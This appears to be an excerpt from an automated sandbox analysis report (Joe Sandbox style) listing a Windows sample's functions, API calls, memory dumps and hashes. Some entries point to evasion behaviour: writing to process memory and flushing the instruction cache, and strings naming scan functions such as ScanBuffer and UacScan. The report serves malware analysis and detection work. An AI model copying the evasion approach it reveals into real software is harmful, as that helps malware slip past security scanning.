                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: String$Free$Alloc
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 986138563-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: c89a721efcbfdf6d29cf9a9c3a4f8c2fd6c35c5a4413efbe0b13b79675d4be8c
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53E012B92056059EEFE86F619D40B37333AAFC1740B289499EB04CA154D779D540BD38
                                                                                                                                                                                                                                                                                                                                                      Function 02D070DC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 02D073DA
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: FreeString
                                                                                                                                                                                                                                                                                                                                                      • String ID: H
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3341692771-2852464175
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: ad9c608d0fa90b472b3053c8023f2207b0a41a6e85cdd259b437d3da2b8605e4
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: d6f7479526d42888ac00766ba88c04e2709da2726d64f4615f28b8ae69b7cb07
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad9c608d0fa90b472b3053c8023f2207b0a41a6e85cdd259b437d3da2b8605e4
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2B1AC74A01608AFEB55CFA9D480A9DFBF2FF89314F248169E955AB3A0D730AC45CF50
                                                                                                                                                                                                                                                                                                                                                      Function 02CFE760 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • VariantCopy.OLEAUT32(00000000,00000000), ref: 02CFE781
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CFE364: VariantClear.OLEAUT32(?), ref: 02CFE373
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Variant$ClearCopy
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 274517740-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: b150236b39c0560de42cafd51b8c0bf570e379999351a0ca89d2d2b308b15124
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0ae13d6b6a236613a0c3a7225fff258ab02e8be49be33db133cf406a2e22af5c
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b150236b39c0560de42cafd51b8c0bf570e379999351a0ca89d2d2b308b15124
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A611A5607002108BD7F4AF2DC8C8A6B77DBAF84750B118467E74A8B675DB30CD45EA62
                                                                                                                                                                                                                                                                                                                                                      Function 02CFE3FC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: InitVariant
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1927566239-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 84480e1d94c321ea51f9f28bca4e3bcf72647aadfbb41a884977e95de5da6bae
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: a8f6f91a1a55daaf5502f92e1a51189f0371e87b92569bbfee8251ef833a6103
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 84480e1d94c321ea51f9f28bca4e3bcf72647aadfbb41a884977e95de5da6bae
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A3152726001089FDBD1DFE9D884AAE7BE9EB4C304F444469FB05D3260D734DA54CBA5
                                                                                                                                                                                                                                                                                                                                                      Function 02D089D0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D0823C,?,?,00000000,?,02D07A7E,ntdll,00000000,00000000,02D07AC3,?,?,00000000), ref: 02D0820A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D081CC: GetModuleHandleA.KERNELBASE(?), ref: 02D0821E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D082FC,?,?,00000000,00000000,?,02D08215,00000000,KernelBASE,00000000,00000000,02D0823C), ref: 02D082C1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D082C7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(?,?), ref: 02D082D9
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D07D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02D07DEC
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02D083C2), ref: 02D083A4
                                                                                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(75470000,00000000,00000000,00000000,00000000,02D7738C,Function_0000662C,00000004,02D7739C,02D7738C,05F5E103,00000040,02D773A0,75470000,00000000,00000000), ref: 02D08AAA
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1478290883-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 4fa571d70b1a19e19b5e1122e9f37133a7c9fe23fc29e3022ea440822298069c
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 60cab84dd6ee1f63a52f3ad93f34ddb5214497f3e0e635809cdf3fd2edbd2962
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4fa571d70b1a19e19b5e1122e9f37133a7c9fe23fc29e3022ea440822298069c
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A210370B80304ABF794F7B5DC41B9EB7A9DB04700F500860BB55E73D0D674AD44AA39
                                                                                                                                                                                                                                                                                                                                                      Function 02D06D6C Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • CLSIDFromProgID.OLE32(00000000,?,00000000,02D06DB9,?,?,?,00000000), ref: 02D06D99
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF4C60: SysFreeString.OLEAUT32(02D0F4A4), ref: 02CF4C6E
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: FreeFromProgString
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4225568880-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 402bdff5bc8f217b687e6e939cda6b38e0fb534f94e5506794c29d1b02b8e2d0
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: d5114ed5cdcf6e672b02a8624645c911c9e07182cad55bd69179a928dff922a8
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 402bdff5bc8f217b687e6e939cda6b38e0fb534f94e5506794c29d1b02b8e2d0
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78E0E536200708BBE365EB62EC91E8E77ADDB8A710B5104B1E70093650D971AE1498B0
                                                                                                                                                                                                                                                                                                                                                      Function 02CF5868 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(02CF0000,?,00000105), ref: 02CF5886
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF5ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02CF0000,02D1E790), ref: 02CF5AE8
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02CF0000,02D1E790), ref: 02CF5B06
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF5ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02CF0000,02D1E790), ref: 02CF5B24
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02CF5B42
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF5ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02CF5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02CF5B8B
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF5ACC: RegQueryValueExA.ADVAPI32(?,02CF5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02CF5BD1,?,80000001), ref: 02CF5BA9
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF5ACC: RegCloseKey.ADVAPI32(?,02CF5BD8,00000000,?,?,00000000,02CF5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02CF5BCB
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2796650324-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 7f8f77932fcdbc5c90210335602098ae450e9ef3aa60b77dbdc0cb607d9f4a58
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BDE09271A403149FCB94DE9CC8C0B5633D8AF48790F444961EE58CF346D7B0DA208BD0
                                                                                                                                                                                                                                                                                                                                                      Function 02CF7DE0 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02CF7DF4
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 7ebe6ff94a676046cd6a426ad1a4fdac13e8367b42668e02e0e412efa8c72591
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5D05BB23091507AE264965B5D44EA75BDCCBC6770F10063EF668C7180D7208C05C771
                                                                                                                                                                                                                                                                                                                                                      Function 02CF7E80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(00000000,?,02D1356F,ScanString,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,ScanBuffer,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,Initialize), ref: 02CF7E8B
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 7398be88259ab56bd94e9b78fb33d2792a965cb7e00bee938a382832776afd26
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7C08CF23116010E1EE4A6BC1CC421A429D09C4134B601E23EB38CA2C1E326992A3820
                                                                                                                                                                                                                                                                                                                                                      Function 02CF7E5C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(00000000,?,02D1041F,ScanString,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,ScanString,02D77380,02D1B7B8,UacScan,02D77380,02D1B7B8,UacInitialize), ref: 02CF7E67
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: b07eea414aa6baa5c584909d3b86b552c4b0ad49416bd742cd4c4d4f9540ee31
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68C08CA03012010E5AE866BC2CC424A528E09842387640A23AB38C62E2E33A99AB3810
                                                                                                                                                                                                                                                                                                                                                      Function 02CF4C78 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: FreeString
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3341692771-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 5a0fda811deda4449a26914b882cba46a0195c805436b99864ba35f0d410593f
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9EC012A260063057EBF55699ACC075362DC9B45294B1900A19705D7251E364D90056A0
                                                                                                                                                                                                                                                                                                                                                      Function 02D1C35C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
